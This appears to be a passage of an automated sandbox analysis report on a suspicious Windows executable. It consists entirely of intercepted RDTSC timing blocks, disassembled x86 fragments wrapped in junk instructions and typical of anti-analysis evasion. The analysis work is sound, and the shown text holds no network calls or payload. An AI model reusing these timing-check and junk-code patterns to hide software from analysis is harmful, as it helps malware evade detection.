Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F50084 second address: 4F500BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d jmp 00007F7A2CC6ACF4h 0x00000012 mov ebx, esi 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 mov bx, 475Ch 0x0000001b popad 0x0000001c xchg eax, ecx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F501DD second address: 4F501E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F501E5 second address: 4F50280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 mov ebx, ecx 0x0000000b mov al, 8Dh 0x0000000d popad 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 push ebx 0x00000013 mov ah, DAh 0x00000015 pop edx 0x00000016 pushad 0x00000017 call 00007F7A2CC6ACF2h 0x0000001c pop esi 0x0000001d call 00007F7A2CC6ACEBh 0x00000022 pop ecx 0x00000023 popad 0x00000024 popad 0x00000025 test esi, esi 0x00000027 jmp 00007F7A2CC6ACEFh 0x0000002c je 00007F7A9F1A90CDh 0x00000032 jmp 00007F7A2CC6ACF6h 0x00000037 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003e jmp 00007F7A2CC6ACF0h 0x00000043 je 00007F7A9F1A90B0h 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F7A2CC6ACF7h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F50280 second address: 4F50326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F7A2D39F16Eh 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 jmp 00007F7A2D39F170h 0x00000019 test edx, 61000000h 0x0000001f pushad 0x00000020 mov ax, 6D5Dh 0x00000024 call 00007F7A2D39F16Ah 0x00000029 pushfd 0x0000002a jmp 00007F7A2D39F172h 0x0000002f sbb cx, 10E8h 0x00000034 jmp 00007F7A2D39F16Bh 0x00000039 popfd 0x0000003a pop eax 0x0000003b popad 0x0000003c jne 00007F7A9F8DD4F2h 0x00000042 pushad 0x00000043 push edx 0x00000044 mov eax, 6AAD2CD7h 0x00000049 pop esi 0x0000004a mov ax, di 0x0000004d popad 0x0000004e test byte ptr [esi+48h], 00000001h 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F7A2D39F172h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F407CB second address: 4F407CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F407CF second address: 4F407D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F407D5 second address: 4F4083B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7A2CC6ACECh 0x00000009 jmp 00007F7A2CC6ACF5h 0x0000000e popfd 0x0000000f mov si, CD87h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov ah, E6h 0x0000001a pushfd 0x0000001b jmp 00007F7A2CC6ACF5h 0x00000020 add cx, 8326h 0x00000025 jmp 00007F7A2CC6ACF1h 0x0000002a popfd 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F4083B second address: 4F4083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F4083F second address: 4F40859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40859 second address: 4F4085F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F4085F second address: 4F408B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F7A2CC6ACF3h 0x00000014 pushfd 0x00000015 jmp 00007F7A2CC6ACF8h 0x0000001a and esi, 66E844B8h 0x00000020 jmp 00007F7A2CC6ACEBh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F408B5 second address: 4F4092D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F7A2D39F175h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007F7A2D39F177h 0x00000015 and esp, FFFFFFF8h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov cx, bx 0x0000001e pushfd 0x0000001f jmp 00007F7A2D39F177h 0x00000024 or si, A13Eh 0x00000029 jmp 00007F7A2D39F179h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F4092D second address: 4F409AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7A2CC6ACF7h 0x00000009 sub ax, E34Eh 0x0000000e jmp 00007F7A2CC6ACF9h 0x00000013 popfd 0x00000014 jmp 00007F7A2CC6ACF0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e mov dh, ah 0x00000020 mov cx, di 0x00000023 popad 0x00000024 push eax 0x00000025 jmp 00007F7A2CC6ACF4h 0x0000002a xchg eax, ebx 0x0000002b jmp 00007F7A2CC6ACF0h 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F409AF second address: 4F409B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F409B5 second address: 4F409DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7A2CC6ACEEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F409DE second address: 4F409E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F409E4 second address: 4F409E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F409E8 second address: 4F40A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7A2D39F16Fh 0x00000010 xor ah, 0000002Eh 0x00000013 jmp 00007F7A2D39F179h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F7A2D39F170h 0x0000001f adc eax, 1E24F3A8h 0x00000025 jmp 00007F7A2D39F16Bh 0x0000002a popfd 0x0000002b popad 0x0000002c mov esi, dword ptr [ebp+08h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F7A2D39F175h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40A5D second address: 4F40A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40A63 second address: 4F40A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40A67 second address: 4F40A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40A6B second address: 4F40ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d jmp 00007F7A2D39F174h 0x00000012 test esi, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ecx 0x00000019 pushfd 0x0000001a jmp 00007F7A2D39F179h 0x0000001f jmp 00007F7A2D39F16Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40ABA second address: 4F40B56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7A9F1B059Dh 0x0000000f pushad 0x00000010 push ecx 0x00000011 push edx 0x00000012 pop eax 0x00000013 pop edi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F7A2CC6ACF2h 0x0000001b and eax, 76840F88h 0x00000021 jmp 00007F7A2CC6ACEBh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F7A2CC6ACF8h 0x0000002d jmp 00007F7A2CC6ACF5h 0x00000032 popfd 0x00000033 popad 0x00000034 popad 0x00000035 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003c jmp 00007F7A2CC6ACEEh 0x00000041 mov ecx, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40B56 second address: 4F40B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40B5A second address: 4F40B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40B60 second address: 4F40B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40B66 second address: 4F40B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40B6A second address: 4F40BB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F7A9F8E498Bh 0x00000011 pushad 0x00000012 mov edx, ecx 0x00000014 pushfd 0x00000015 jmp 00007F7A2D39F16Ah 0x0000001a add esi, 50D229D8h 0x00000020 jmp 00007F7A2D39F16Bh 0x00000025 popfd 0x00000026 popad 0x00000027 test byte ptr [77516968h], 00000002h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40BB2 second address: 4F40BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40BB6 second address: 4F40BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40BBC second address: 4F40BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40BC2 second address: 4F40BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40BC6 second address: 4F40BFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F7A9F1B04BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7A2CC6ACF7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40BFF second address: 4F40C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40C25 second address: 4F40C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40C29 second address: 4F40C3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40C3C second address: 4F40C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 96h 0x00000005 pushfd 0x00000006 jmp 00007F7A2CC6ACF0h 0x0000000b or al, FFFFFF88h 0x0000000e jmp 00007F7A2CC6ACEBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7A2CC6ACF5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40C7C second address: 4F40CE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7A2D39F177h 0x00000009 or esi, 46B94C2Eh 0x0000000f jmp 00007F7A2D39F179h 0x00000014 popfd 0x00000015 call 00007F7A2D39F170h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f pushad 0x00000020 jmp 00007F7A2D39F16Eh 0x00000025 mov bh, cl 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40CE5 second address: 4F40CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40CE9 second address: 4F40CFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F172h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40CFF second address: 4F40D4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F7A2CC6ACF6h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ax, dx 0x00000014 movsx ebx, cx 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 jmp 00007F7A2CC6ACF4h 0x0000001e push dword ptr [ebp+14h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40D4C second address: 4F40D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40D50 second address: 4F40D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40D56 second address: 4F40D7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F174h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7A2D39F16Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40D7F second address: 4F40D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40D83 second address: 4F40D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40DD1 second address: 4F40DF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7A2CC6ACF0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40DF5 second address: 4F40DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40DF9 second address: 4F40DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F50DAD second address: 4F50DFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1A17F422h 0x00000008 mov dx, 306Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 movzx esi, dx 0x00000014 pushfd 0x00000015 jmp 00007F7A2D39F177h 0x0000001a and ah, FFFFFFCEh 0x0000001d jmp 00007F7A2D39F179h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F50DFE second address: 4F50E04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F50B00 second address: 4F50B06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F50B06 second address: 4F50B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F50B0C second address: 4F50B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F50B10 second address: 4F50B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7A2CC6ACF6h 0x00000012 xor al, 00000028h 0x00000015 jmp 00007F7A2CC6ACEBh 0x0000001a popfd 0x0000001b movzx eax, bx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F50B46 second address: 4F50B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F50B4C second address: 4F50B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FC095C second address: 4FC0962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FC0962 second address: 4FC0968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FC0968 second address: 4FC0990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push ecx 0x0000000b push edx 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e call 00007F7A2D39F178h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FC0990 second address: 4FC099D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FC099D second address: 4FC09A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FC09A1 second address: 4FC09B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FC09B4 second address: 4FC09DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 mov ecx, 679B3BC7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7A2D39F179h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FC09DD second address: 4FC09E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FC09E3 second address: 4FC09E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0E49 second address: 4FB0E50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 00h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0E50 second address: 4FB0E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov di, ax 0x0000000c mov ecx, 69891B65h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0E69 second address: 4FB0E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0E6D second address: 4FB0E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0E71 second address: 4FB0E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0E77 second address: 4FB0E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 movsx ebx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ax, di 0x00000013 mov bx, B354h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0E8F second address: 4FB0E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0E95 second address: 4FB0E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FB0CFD second address: 4FB0D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
